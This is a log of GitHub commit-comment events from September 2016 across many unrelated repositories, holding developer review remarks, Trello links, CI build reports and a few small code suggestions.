{"id":"4604773687","type":"CommitCommentEvent","actor":{"login":"macool"},"repo":{"name":"noggalito/porttare-frontend"},"payload":{"comment":{"id":19136213,"position":6,"line":53,"path":"app/scripts/controllers/courier-controller.js","commit_id":"12416ad2115b4f9d4c2213060fc5e86449adb44f","created_at":"2016-09-22T20:06:24Z","updated_at":"2016-09-22T20:06:24Z","body":"si está en blanco? mejor hacer que el backend tolere este en blanco"}},"created_at":"2016-09-22T20:06:24Z"}
{"id":"4604776650","type":"CommitCommentEvent","actor":{"login":"Anplante"},"repo":{"name":"Anplante/tf_scrabble"},"payload":{"comment":{"id":19136217,"position":null,"line":null,"path":null,"commit_id":"ed003b122616bf84db8f6ad3123876def72a10b7","created_at":"2016-09-22T20:06:59Z","updated_at":"2016-09-22T20:06:59Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Créer le menu de création - 3](https://trello.com/c/6KAkR5JH/2-creer-le-menu-de-creation-3)"}},"created_at":"2016-09-22T20:06:59Z"}
{"id":"4604778993","type":"CommitCommentEvent","actor":{"login":"Anplante"},"repo":{"name":"Anplante/tf_scrabble"},"payload":{"comment":{"id":19136220,"position":null,"line":null,"path":null,"commit_id":"b7b342a1db01e6148e09106e651ce44c0fcfb1c5","created_at":"2016-09-22T20:07:27Z","updated_at":"2016-09-22T20:07:27Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Afficher les info joueurs - 3](https://trello.com/c/eqktCXkh/5-afficher-les-info-joueurs-3)"}},"created_at":"2016-09-22T20:07:27Z"}
{"id":"4604780335","type":"CommitCommentEvent","actor":{"login":"nicoxx"},"repo":{"name":"gator-life/gator.life"},"payload":{"comment":{"id":19136221,"position":null,"line":null,"path":null,"commit_id":"123efbcd8035db0c41b4593718bdbd883b5a50e9","created_at":"2016-09-22T20:07:43Z","updated_at":"2016-09-22T20:07:43Z","body":"This is on purpose because this file is very tiny (4kb) so it's seems not interesting to put it in LFS.\r\n\r\nThis goes in lfs depending on filters in .gitattributes\r\nhttps://github.com/gator-life/gator.life/blob/35f7de89b613c027eaa8b8b41ceca0b758d21f28/.gitattributes#L3\r\n\r\n"}},"created_at":"2016-09-22T20:07:43Z"}
{"id":"4604780985","type":"CommitCommentEvent","actor":{"login":"rv9r"},"repo":{"name":"rv9r/rv9r_22"},"payload":{"comment":{"id":19136222,"position":null,"line":null,"path":null,"commit_id":"900d1d34968f6a160d681af8dd8f33d8ce1c6d3f","created_at":"2016-09-22T20:07:50Z","updated_at":"2016-09-22T20:07:50Z","body":"اهلا وسهلا \r\n"}},"created_at":"2016-09-22T20:07:50Z"}
{"id":"4604781189","type":"CommitCommentEvent","actor":{"login":"cooler-SAI"},"repo":{"name":"cooler-SAI/JadeCore548-patched"},"payload":{"comment":{"id":19136223,"position":null,"line":null,"path":null,"commit_id":"31af6605c863df9b4ed661873e6105a6af8904f7","created_at":"2016-09-22T20:07:53Z","updated_at":"2016-09-22T20:07:53Z","body":"Ohhh!! Gratzz! )))\r\nОтлично!)"}},"created_at":"2016-09-22T20:07:53Z"}
{"id":"4604788381","type":"CommitCommentEvent","actor":{"login":"kilotaras"},"repo":{"name":"totalgood/keras"},"payload":{"comment":{"id":19136240,"position":56,"line":218,"path":"keras/layers/advanced_activations.py","commit_id":"232f77003f0357d3de31a0db0b1ac9c532dfb3ce","created_at":"2016-09-22T20:09:13Z","updated_at":"2016-09-22T20:09:13Z","body":"Looks like you need to add `K.select` to keras which wraps `tf.select / K.switch`\r\n\r\nalso\r\n1. Use K.lesser, K.greater\r\n2. tensors are lazy so dont be afraid to use extra variables\r\n\r\n```python\r\ndef call(self, x, mask=None):\r\n  pos = self.call_alpha_gt(x, self.alphas)\r\n  neg = self.call_alpha_lt(x, self.alphas)\r\n  \r\n  is_pos = K.greater(self.alphas, 0)\r\n  is_neg = K.lesser(self.alphas, 0)\r\n\r\n  return K.select(is_pos, pos,\r\n                  K.select(is_neg, neg, x))\r\n```"}},"created_at":"2016-09-22T20:09:13Z"}
{"id":"4604794747","type":"CommitCommentEvent","actor":{"login":"Lillecarl"},"repo":{"name":"cmangos/mangos-tbc"},"payload":{"comment":{"id":19136251,"position":null,"line":null,"path":null,"commit_id":"89fde25ddd480e49b99c9876acd65a56c9e64cd4","created_at":"2016-09-22T20:10:14Z","updated_at":"2016-09-22T20:10:14Z","body":"Finally, good one! :)"}},"created_at":"2016-09-22T20:10:14Z"}
{"id":"4604798853","type":"CommitCommentEvent","actor":{"login":"robertogagliotta"},"repo":{"name":"robertogagliotta/openemr"},"payload":{"comment":{"id":19136261,"position":null,"line":null,"path":null,"commit_id":"6c33d2577bc06f85f69dacee936ef7999055428c","created_at":"2016-09-22T20:10:59Z","updated_at":"2016-09-22T20:10:59Z","body":"I did not read the email that you sent me about one more else if until now. SnomedCT_INT is not available in UMLS for download any more but will be a good idea to leave it line 130 in the script in case someone has the file and decide to installed. "}},"created_at":"2016-09-22T20:10:59Z"}
{"id":"4604803394","type":"CommitCommentEvent","actor":{"login":"Anplante"},"repo":{"name":"Anplante/tf_scrabble"},"payload":{"comment":{"id":19136270,"position":null,"line":null,"path":null,"commit_id":"5ff005be400271212aa23b1a0310ff408c892047","created_at":"2016-09-22T20:11:50Z","updated_at":"2016-09-22T20:11:50Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Passer prochaine joueur - 2](https://trello.com/c/GNkuWztj/9-passer-prochaine-joueur-2)"}},"created_at":"2016-09-22T20:11:50Z"}
{"id":"4604804056","type":"CommitCommentEvent","actor":{"login":"daimpi"},"repo":{"name":"g4v4g4i/ArgABM"},"payload":{"comment":{"id":19136272,"position":null,"line":null,"path":null,"commit_id":"6da2dcf6b2d1125324e6a9b1fe3f027c981a0527","created_at":"2016-09-22T20:11:58Z","updated_at":"2016-09-22T20:11:58Z","body":"The prospective movement has currently not yet integrated a check for group members on \"defender-child\" arguments. So in principle it is possible (although quite rare) that more than one group member is on a defender child argument looking for a defense of the mother argument."}},"created_at":"2016-09-22T20:11:58Z"}
{"id":"4604812312","type":"CommitCommentEvent","actor":{"login":"lukecwik"},"repo":{"name":"GoogleCloudPlatform/DataflowJavaSDK"},"payload":{"comment":{"id":19136285,"position":53,"line":285,"path":"sdk/src/main/java/com/google/cloud/dataflow/sdk/util/BigQueryTableInserter.java","commit_id":"94d57207924ed8650cf3c97fccb2a45f27bcc6a3","created_at":"2016-09-22T20:13:33Z","updated_at":"2016-09-22T20:13:33Z","body":"Filed https://issues.apache.org/jira/browse/BEAM-670"}},"created_at":"2016-09-22T20:13:33Z"}
{"id":"4604816500","type":"CommitCommentEvent","actor":{"login":"Gruck"},"repo":{"name":"les-campagnards/navco"},"payload":{"comment":{"id":19136291,"position":34,"line":30,"path":"js/renderer.js","commit_id":"3935d66df16a4c3315d871ed049140312323e694","created_at":"2016-09-22T20:14:21Z","updated_at":"2016-09-22T20:14:21Z","body":"Onsider cleaning up old renderer ?\r\n\tvar canvas = document.querySelector(\"canvas\"); \r\n\tcanvas.parentNode.removeChild(canvas);\r\n\r\n"}},"created_at":"2016-09-22T20:14:21Z"}
{"id":"4604816936","type":"CommitCommentEvent","actor":{"login":"mlynch"},"repo":{"name":"driftyco/ionic-native"},"payload":{"comment":{"id":19136293,"position":null,"line":null,"path":null,"commit_id":"c33842f8f027d0ccd0259e807a3a6c64bc4b81f0","created_at":"2016-09-22T20:14:26Z","updated_at":"2016-09-22T20:14:26Z","body":"Fixed in master"}},"created_at":"2016-09-22T20:14:26Z"}
{"id":"4604819492","type":"CommitCommentEvent","actor":{"login":"usrflo"},"repo":{"name":"perlundq/yajsync"},"payload":{"comment":{"id":19136298,"position":null,"line":null,"path":null,"commit_id":"105d270ccc9f381694dcea690ed903fe82b9590c","created_at":"2016-09-22T20:14:56Z","updated_at":"2016-09-22T20:14:56Z","body":"Are there currently or will there be any code changes that require JDK 8?\r\nIs JDK 7 compatibility really unrequired?"}},"created_at":"2016-09-22T20:14:56Z"}
{"id":"4604823554","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19136304,"position":null,"line":null,"path":null,"commit_id":"a236e3799d08fc43546c7cb5c7204f70ef918444","created_at":"2016-09-22T20:15:42Z","updated_at":"2016-09-22T20:15:42Z","body":"MoreDayliteFollowup (JasonGlazer) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1770 of 1770 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a236e3799d08fc43546c7cb5c7204f70ef918444-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a236e3799d08fc43546c7cb5c7204f70ef918444-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a236e3799d08fc43546c7cb5c7204f70ef918444-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.15%25-green.svg)</a>\n"}},"created_at":"2016-09-22T20:15:42Z"}
{"id":"4604825268","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19136305,"position":null,"line":null,"path":null,"commit_id":"dbb41afaf86846ad837bb29419af06f5af516f99","created_at":"2016-09-22T20:16:03Z","updated_at":"2016-09-22T20:16:03Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 258](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1219&buildTypeId=Xbim_XbimGeometry_XbimGeometry) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:27:23"}},"created_at":"2016-09-22T20:16:03Z"}
{"id":"4604825416","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimEssentials"},"payload":{"comment":{"id":19136306,"position":null,"line":null,"path":null,"commit_id":"d1d2e5052473a3586237011fee19c5b24ce6491e","created_at":"2016-09-22T20:16:05Z","updated_at":"2016-09-22T20:16:05Z","body":"TeamCity Xbim :: Xbim Essentials :: XbimEssentials [Build 431](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1220&buildTypeId=XbimEssentials_XbimEssentials) is now running\n"}},"created_at":"2016-09-22T20:16:05Z"}
{"id":"4604830509","type":"CommitCommentEvent","actor":{"login":"Jain-Sakshi"},"repo":{"name":"NIIT-Software-Engineering/Samaksh-Sibin-Shivam-Yadav-Yash-Tanushree-Sakshi"},"payload":{"comment":{"id":19136321,"position":null,"line":null,"path":null,"commit_id":"e162cc05f02ae4441b293218372a22d178008765","created_at":"2016-09-22T20:17:02Z","updated_at":"2016-09-22T20:17:02Z","body":"[Sakshi-Feasibility Analysis.docx](https://github.com/NIIT-Software-Engineering/Samaksh-Sibin-Shivam-Yadav-Yash-Tanushree-Sakshi/files/488270/Sakshi-Feasibility.Analysis.docx)\r\n"}},"created_at":"2016-09-22T20:17:02Z"}
{"id":"4604830622","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19136323,"position":null,"line":null,"path":null,"commit_id":"feee1db581a852e034f50474f310c6e458303e09","created_at":"2016-09-22T20:17:04Z","updated_at":"2016-09-22T20:17:04Z","body":"develop (mjwitte) - x86_64-MacOS-10.9-clang: OK (1769 of 1769 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-feee1db581a852e034f50474f310c6e458303e09-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-feee1db581a852e034f50474f310c6e458303e09-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-22T20:17:04Z"}
{"id":"4604834624","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimEssentials"},"payload":{"comment":{"id":19136329,"position":null,"line":null,"path":null,"commit_id":"d1d2e5052473a3586237011fee19c5b24ce6491e","created_at":"2016-09-22T20:17:47Z","updated_at":"2016-09-22T20:17:47Z","body":"TeamCity Xbim :: Xbim Essentials :: XbimEssentials [Build 431](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1220&buildTypeId=XbimEssentials_XbimEssentials) outcome was **FAILURE**\nSummary: Exit code 1 (new) Build time: 00:01:41"}},"created_at":"2016-09-22T20:17:47Z"}
{"id":"4604835382","type":"CommitCommentEvent","actor":{"login":"nmccready"},"repo":{"name":"CartoDB/cartodb-nodejs"},"payload":{"comment":{"id":19136332,"position":54,"line":61,"path":"lib/import.js","commit_id":"2560bf813c877633dc44dd89c4346600bfb888aa","created_at":"2016-09-22T20:17:56Z","updated_at":"2016-09-22T20:17:56Z","body":"Why is this error swallowed?"}},"created_at":"2016-09-22T20:17:56Z"}
{"id":"4604839325","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"robertogagliotta/openemr"},"payload":{"comment":{"id":19136340,"position":null,"line":null,"path":null,"commit_id":"6c33d2577bc06f85f69dacee936ef7999055428c","created_at":"2016-09-22T20:18:41Z","updated_at":"2016-09-22T20:18:41Z","body":"the main reason for also making a separate else if (below the current else if's) is that you then don't need to test the prior packages (since you didn't change anything)"}},"created_at":"2016-09-22T20:18:41Z"}
{"id":"4604839624","type":"CommitCommentEvent","actor":{"login":"IncarVishnu"},"repo":{"name":"IncarVishnu/platformer"},"payload":{"comment":{"id":19136341,"position":null,"line":null,"path":null,"commit_id":"8fd6ace2fa6650c6ca597d65217d123b7d9036a7","created_at":"2016-09-22T20:18:44Z","updated_at":"2016-09-22T20:18:44Z","body":"Ich habe mit requireJs eine Dependency hinzugefügt, damit wir in der Lage sind JS-Files zu \"includen\".\r\nDas bedeutet es ändert sich ein wenig was an der Schreibweise, wenn wir eine neue Datei erstellen sollten.\r\nAnstatt:\r\n`var foo = 0;`\r\n`function getFoo() {`\r\n`return foo;`\r\n`}`\r\nFolgendes:\r\n`define(function() {`\r\n`var foo = 0;`\r\n`function getFoo() {`\r\n`return foo;`\r\n`}`\r\n`return {`\r\n`getFoo: getFoo`\r\n`};`\r\n`});`\r\n_(Ich habe keine Ahnung, warum ich den Code hier nicht formatieren kann. Ich hoffe ihr könnts lesen)_\r\n\r\nAlso das gilt nur für jedes neue File. Sobald ihr Daten von woanders braucht, müsste ihr \"require\" als Parameter hinzufügen. In der \"world.js\" könnt ihr das sehen.\r\n\r\nWarum das Ganze?\r\nLaden wir alle JS-Files im HTML und wird der Code in diesen nicht von einem `(function() {})();` umschlossen, landen die globalen Variablen und die Functions im window.object, das sich von der Entwickler-Konsole aus erreichen lässt. Dadurch könnten sich Spieler Vorteile ercheaten, in dem sie die Figur beschleunigen, höher springen lassen, das Level verändern oder oder oder...\r\n\r\nVG Daniel"}},"created_at":"2016-09-22T20:18:44Z"}
{"id":"4604840120","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19136343,"position":null,"line":null,"path":null,"commit_id":"b31bfd002a6b665d4f7d86191036c198b1b312ec","created_at":"2016-09-22T20:18:50Z","updated_at":"2016-09-22T20:18:50Z","body":"Затраченное время / 1.2 ч /"}},"created_at":"2016-09-22T20:18:50Z"}
{"id":"4604840906","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19136345,"position":null,"line":null,"path":null,"commit_id":"7c4e7cb6c1f4fe075d37b318bcf582d17811da84","created_at":"2016-09-22T20:18:58Z","updated_at":"2016-09-22T20:18:58Z","body":"iteration (macumber) - x86_64-MacOS-10.10-clang: OK (2388 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7c4e7cb6c1f4fe075d37b318bcf582d17811da84-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7c4e7cb6c1f4fe075d37b318bcf582d17811da84-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-97.55%25-yellow.svg)</a> \n"}},"created_at":"2016-09-22T20:18:58Z"}
{"id":"4604842266","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19136349,"position":null,"line":null,"path":null,"commit_id":"a1722b22406de1fc587bc25e5940d4ac10f2089a","created_at":"2016-09-22T20:19:15Z","updated_at":"2016-09-22T20:19:15Z","body":"Sizing-Simple-Chilled-Ceiling (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a1722b22406de1fc587bc25e5940d4ac10f2089a-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-22T20:19:15Z"}
{"id":"4604846695","type":"CommitCommentEvent","actor":{"login":"gialloporpora"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19136355,"position":76,"line":63,"path":"it/firefox/channel/index.lang","commit_id":"e88d1d139596e8e9d94063b42f588bfc2bfbceb0","created_at":"2016-09-22T20:20:05Z","updated_at":"2016-09-22T20:20:05Z","body":"Di questa non sono convinto perché bisognerebbe fare un invito esplicito \na lasciare un commento (link). Mettendo il link su “I tuoi commenti” non \nè proprio chiarissimo che facendoci clic si accede a un form di feedback.\nSe preferisci quella forma, forse:\n<a>Lascia un commento</a>, ci aiuterai a dare gli ultimi ritocchi per \nperfezionare le prestazioni e funzioni di Firefox in un ambiente stabile.\n\n\n\n"}},"created_at":"2016-09-22T20:20:05Z"}
{"id":"4604846988","type":"CommitCommentEvent","actor":{"login":"SuslikV"},"repo":{"name":"jp9000/obs-studio"},"payload":{"comment":{"id":19136356,"position":null,"line":null,"path":null,"commit_id":"b9b6f70cd50714f5f6a495ae296a0669eafff08e","created_at":"2016-09-22T20:20:08Z","updated_at":"2016-09-22T20:20:08Z","body":"Source properties also a window? Because if changes completed to a source and not saved, new dialog window rises (Save/Discard/Cancel) (obs hide allowed, obs main window hidden) and crash still present on save or discard."}},"created_at":"2016-09-22T20:20:08Z"}
{"id":"4604848281","type":"CommitCommentEvent","actor":{"login":"miguelcleon"},"repo":{"name":"miguelcleon/ODM2-Admin"},"payload":{"comment":{"id":19136357,"position":194,"line":858,"path":"ODM2CZOData/forms.py","commit_id":"2638445dc6af481a83e28ef2b96e9d6ac0792bd4","created_at":"2016-09-22T20:20:20Z","updated_at":"2016-09-22T20:20:20Z","body":"I issued some commits today but they are all for the management command ProcessDataLoggerFile, which I realized wasn't working properly when I had to load some data into our database. I just used it to load said data and it seems to be working fine now. I just thought I'd let you know @lsetiawan "}},"created_at":"2016-09-22T20:20:20Z"}
{"id":"4604849451","type":"CommitCommentEvent","actor":{"login":"nmccready"},"repo":{"name":"CartoDB/cartodb-nodejs"},"payload":{"comment":{"id":19136360,"position":112,"line":90,"path":"lib/import.js","commit_id":"2560bf813c877633dc44dd89c4346600bfb888aa","created_at":"2016-09-22T20:20:35Z","updated_at":"2016-09-22T20:20:35Z","body":"I guess it is ok to swallow the error above as I assume this error will make up for it. However could you not bail out of the stream early and emit the error sooner with the `if (err)` trap?"}},"created_at":"2016-09-22T20:20:35Z"}
{"id":"4604851486","type":"CommitCommentEvent","actor":{"login":"bjourne"},"repo":{"name":"factor/factor"},"payload":{"comment":{"id":19136362,"position":null,"line":null,"path":null,"commit_id":"c02d9135797b1f4c3f4b4fda5c6826e2cb17ff4f","created_at":"2016-09-22T20:20:58Z","updated_at":"2016-09-22T20:20:58Z","body":"Nope. But if you see one I'll definitely investigate."}},"created_at":"2016-09-22T20:20:58Z"}
{"id":"4604852212","type":"CommitCommentEvent","actor":{"login":"doanac"},"repo":{"name":"stephenfin/patchwork"},"payload":{"comment":{"id":19136365,"position":null,"line":null,"path":null,"commit_id":"efdccd9bae68f7d7b8b8649c310944a36b42a3c3","created_at":"2016-09-22T20:21:08Z","updated_at":"2016-09-22T20:21:08Z","body":"This is great! exactly what I was hoping for. I didn't analyze the code too much, but it looks to cover all the bases and gives us a framework for managing regressions."}},"created_at":"2016-09-22T20:21:08Z"}
{"id":"4604853914","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19136369,"position":null,"line":null,"path":null,"commit_id":"9235685d22508fbbed29a2f81a553749d9219c7f","created_at":"2016-09-22T20:21:27Z","updated_at":"2016-09-22T20:21:27Z","body":"os_2_0_develop (macumber) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-9235685d22508fbbed29a2f81a553749d9219c7f-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-9235685d22508fbbed29a2f81a553749d9219c7f-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-22T20:21:27Z"}
{"id":"4604854518","type":"CommitCommentEvent","actor":{"login":"doanac"},"repo":{"name":"stephenfin/patchwork"},"payload":{"comment":{"id":19136374,"position":null,"line":null,"path":null,"commit_id":"efdccd9bae68f7d7b8b8649c310944a36b42a3c3","created_at":"2016-09-22T20:21:34Z","updated_at":"2016-09-22T20:21:34Z","body":"Feel free to add my \"reviewed-by\" tag when you re-post to the mailing list"}},"created_at":"2016-09-22T20:21:34Z"}
{"id":"4604857492","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":19136383,"position":null,"line":null,"path":null,"commit_id":"21b88c12718e0f6449a4779033791bd1d7489788","created_at":"2016-09-22T20:22:07Z","updated_at":"2016-09-22T20:22:07Z","body":"TeamCity Glyssen :: Glyssen pull requests [Build *.*.258.21b88c12718e0f6449a4779033791bd1d7489788](http://build.palaso.org/viewLog.html?buildId=77071&buildTypeId=Glyssen_GlyssenPullRequests) outcome was **SUCCESS**\nSummary: Tests passed: 1496, ignored: 17 Build time: 00:07:43"}},"created_at":"2016-09-22T20:22:07Z"}
{"id":"4604860742","type":"CommitCommentEvent","actor":{"login":"hocinebendou"},"repo":{"name":"bikalabs/bika.lims"},"payload":{"comment":{"id":19136387,"position":4,"line":59,"path":"bika/lims/browser/storage/add_units.pt","commit_id":"ca3b465616d65576dd1b1245989a7aaf74341ac0","created_at":"2016-09-22T20:22:42Z","updated_at":"2016-09-22T20:22:42Z","body":"@rockfruit: I don't know why they complicate things with AA, AB and with digits we can go to infinite!! I did this just because when I test I like to click to increase the start number instead of double click and change the number. I'll restore it later :)"}},"created_at":"2016-09-22T20:22:42Z"}
{"id":"4604875221","type":"CommitCommentEvent","actor":{"login":"JhymerMartinez"},"repo":{"name":"noggalito/porttare-frontend"},"payload":{"comment":{"id":19136404,"position":6,"line":53,"path":"app/scripts/controllers/courier-controller.js","commit_id":"12416ad2115b4f9d4c2213060fc5e86449adb44f","created_at":"2016-09-22T20:25:24Z","updated_at":"2016-09-22T20:25:24Z","body":"Lo elimino en el caso de que no se selecciones ningún valor porque por defecto se carga como `null`"}},"created_at":"2016-09-22T20:25:24Z"}
{"id":"4604877206","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":19136407,"position":null,"line":null,"path":null,"commit_id":"99c92ed3ee9ef7759d54439a9727d6b96d5e5b36","created_at":"2016-09-22T20:25:46Z","updated_at":"2016-09-22T20:25:46Z","body":"fast-forwarding develop-2.2 to borshop-integration-1483-fixes/lrb/ensure-optional-pb-field-usage = 87dfc0f4"}},"created_at":"2016-09-22T20:25:46Z"}
{"id":"4604879895","type":"CommitCommentEvent","actor":{"login":"dhalperi"},"repo":{"name":"GoogleCloudPlatform/DataflowJavaSDK"},"payload":{"comment":{"id":19136414,"position":53,"line":285,"path":"sdk/src/main/java/com/google/cloud/dataflow/sdk/util/BigQueryTableInserter.java","commit_id":"94d57207924ed8650cf3c97fccb2a45f27bcc6a3","created_at":"2016-09-22T20:26:15Z","updated_at":"2016-09-22T20:26:15Z","body":"I believe the actual bug is that at L287 we do not use the cached value from 284 but instead use a new value from the `backoff`."}},"created_at":"2016-09-22T20:26:15Z"}
{"id":"4604880866","type":"CommitCommentEvent","actor":{"login":"DemonWav"},"repo":{"name":"DemonWav/MinecraftDev"},"payload":{"comment":{"id":19136420,"position":null,"line":null,"path":null,"commit_id":"2c42846055f1ab771532999237417c256103650b","created_at":"2016-09-22T20:26:27Z","updated_at":"2016-09-22T20:26:27Z","body":"s/even/event"}},"created_at":"2016-09-22T20:26:27Z"}
{"id":"4604882604","type":"CommitCommentEvent","actor":{"login":"dhalperi"},"repo":{"name":"GoogleCloudPlatform/DataflowJavaSDK"},"payload":{"comment":{"id":19136426,"position":53,"line":285,"path":"sdk/src/main/java/com/google/cloud/dataflow/sdk/util/BigQueryTableInserter.java","commit_id":"94d57207924ed8650cf3c97fccb2a45f27bcc6a3","created_at":"2016-09-22T20:26:46Z","updated_at":"2016-09-22T20:26:46Z","body":"(and here the check is inverted as well)"}},"created_at":"2016-09-22T20:26:46Z"}
{"id":"4604883673","type":"CommitCommentEvent","actor":{"login":"13steinj"},"repo":{"name":"reddit/reddit"},"payload":{"comment":{"id":19136428,"position":null,"line":null,"path":null,"commit_id":"a57450aec387a52d67c9f0670530249b2a94822e","created_at":"2016-09-22T20:26:59Z","updated_at":"2016-09-22T20:26:59Z","body":"Huzzah"}},"created_at":"2016-09-22T20:26:59Z"}
{"id":"4604883890","type":"CommitCommentEvent","actor":{"login":"dhalperi"},"repo":{"name":"GoogleCloudPlatform/DataflowJavaSDK"},"payload":{"comment":{"id":19136429,"position":53,"line":285,"path":"sdk/src/main/java/com/google/cloud/dataflow/sdk/util/BigQueryTableInserter.java","commit_id":"94d57207924ed8650cf3c97fccb2a45f27bcc6a3","created_at":"2016-09-22T20:27:01Z","updated_at":"2016-09-22T20:27:01Z","body":"sigh, another backporting introduced bug."}},"created_at":"2016-09-22T20:27:01Z"}
{"id":"4604884686","type":"CommitCommentEvent","actor":{"login":"baleboy"},"repo":{"name":"rakuco/crosswalk-website"},"payload":{"comment":{"id":19136430,"position":5,"line":5,"path":"public/contribute/building_crosswalk/_data.json","commit_id":"3e1decfa9a3f8f0f37b25178cdc3387e26be1593","created_at":"2016-09-22T20:27:10Z","updated_at":"2016-09-22T20:27:10Z","body":"should be \"android_build\" based on the corresponding .md filename"}},"created_at":"2016-09-22T20:27:10Z"}
{"id":"4604886049","type":"CommitCommentEvent","actor":{"login":"baleboy"},"repo":{"name":"rakuco/crosswalk-website"},"payload":{"comment":{"id":19136436,"position":8,"line":8,"path":"public/contribute/building_crosswalk/_data.json","commit_id":"3e1decfa9a3f8f0f37b25178cdc3387e26be1593","created_at":"2016-09-22T20:27:25Z","updated_at":"2016-09-22T20:27:25Z","body":"linux_build"}},"created_at":"2016-09-22T20:27:25Z"}
{"id":"4604886831","type":"CommitCommentEvent","actor":{"login":"baleboy"},"repo":{"name":"rakuco/crosswalk-website"},"payload":{"comment":{"id":19136439,"position":11,"line":11,"path":"public/contribute/building_crosswalk/_data.json","commit_id":"3e1decfa9a3f8f0f37b25178cdc3387e26be1593","created_at":"2016-09-22T20:27:35Z","updated_at":"2016-09-22T20:27:35Z","body":"windows_build"}},"created_at":"2016-09-22T20:27:35Z"}
{"id":"4604889933","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19136446,"position":null,"line":null,"path":null,"commit_id":"0844933eb096739e6108ed8a7e834012f2355b71","created_at":"2016-09-22T20:28:08Z","updated_at":"2016-09-22T20:28:08Z","body":"We can now get to work on C# Comms...."}},"created_at":"2016-09-22T20:28:08Z"}
{"id":"4604890793","type":"CommitCommentEvent","actor":{"login":"pvint"},"repo":{"name":"hydrogen-music/hydrogen"},"payload":{"comment":{"id":19136448,"position":null,"line":null,"path":null,"commit_id":"6259a9e9d95f570366c1c27da101fa8697e878f1","created_at":"2016-09-22T20:28:17Z","updated_at":"2016-09-22T20:28:17Z","body":"Just did some tests:\r\n\r\n- Removed RAPTOR, added RAPTOR2 - Compiles OK\r\n- Just RAPTOR - fails\r\n- Both RAPTOR and RAPTOR2 - fails\r\n\r\nStrange. "}},"created_at":"2016-09-22T20:28:17Z"}
